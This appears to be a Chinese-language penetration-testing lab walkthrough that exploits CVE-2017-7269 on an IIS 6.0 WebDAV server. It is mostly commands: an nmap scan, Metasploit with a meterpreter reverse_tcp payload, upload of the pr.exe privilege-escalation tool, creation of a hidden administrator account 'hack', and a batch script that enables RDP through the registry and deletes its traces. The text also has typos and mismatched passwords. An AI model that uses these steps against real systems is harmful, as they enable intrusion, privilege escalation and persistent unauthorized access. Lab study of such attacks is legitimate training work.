1,使用命令zenmap打开nmap图形化扫描工具,选择配置,点击新的配置或命令
找到模块http-webdav-scan,勾上选用该模块对目标靶机进行扫描
根据扫描结果的信息可以找到靶机的操作系统为Microsoft Windows Server 2003 R2,并且开启WebDAV服务的IIS6.0,初步可以确认该漏洞存在
服务器版本信息:
使用msfconsole命令打开metasploit漏洞测试平台
使用search命令搜索cve-2017-7269
使用use命令利用该模块,同时使用show options命令来查看需要配置的参数
设置目标靶机ip
使用set payload windows/meterpreter/reverse_tcp设置攻击的载荷,然后使用命令set LHOST设置回连的地址,并执行exploit溢出攻击模块
成功获取到目标靶机的meterpreter权限
使用命令shell进入,靶机的命令行终端
然后使用命令whomai查看当前用户权限,发现当前权限为network service一般用户权限
使用命令getsystem、getuid尝试获取更高权限,均告失败
使用cd命令切换路径到c:\Inetpub\wwwroot尝试对web的根目录进行查看发现没有权限查看,但是切换c:\根路径发现有权限
实际服务器上存在该路径
根据我们对渗透中的常规思路,一般用户在访问某些文件夹的时候会提示没有权限,但是如果文件夹的权限比较特殊的话,我们就可以对这一类的文件夹进行操作
使用命令shell再次打开服务器的命令终端,使用命令cd c:\Inetpub\wwroot进入web的根目录下,然后尝试创建一个文件夹
发现拒绝访问,我们再去其他目录尝试一下
发现了一个可以上传文件的地方,我们在里面创建一个文档zzxc
第十四步,回到meterpreter,然后使用命令upload上传提权工具pr.exe(提权工具有很多,iis6.exe,pr.exe等等)
第十五步,回到shell中确认工具是否上传成功
第十六步,使用命令pr.exe "whoami"进行提权,发现此时已经是system权限了
第十七步,使用命令pr.exe “net user hack P@ssword /add”创建用户
第十八步,使用命令pr.exe “net localhost administrators hack /add”将用户添加到管理员
第十九步,使用命令netstat –an查看远程连接是否打开
若发现3389没有打开,可通过上传一个3389.bat批处理来开启3389远程服务,文件内容如下,具体操作参照十六至十八步
===================================================
echo Windows Registry Editor Version 5.00>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]>>3389.reg
echo "fDenyTSConnections"=dword:00000000>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]>>3389.reg
echo "PortNumber"=dword:00000d3d>>3389.reg
regedit /s 3389.reg
del 3389.reg
第二十一步,使用命令rdesktop,输入用户名hack密码P@ssw0rd,进行远程连接
成功进入目标靶机系统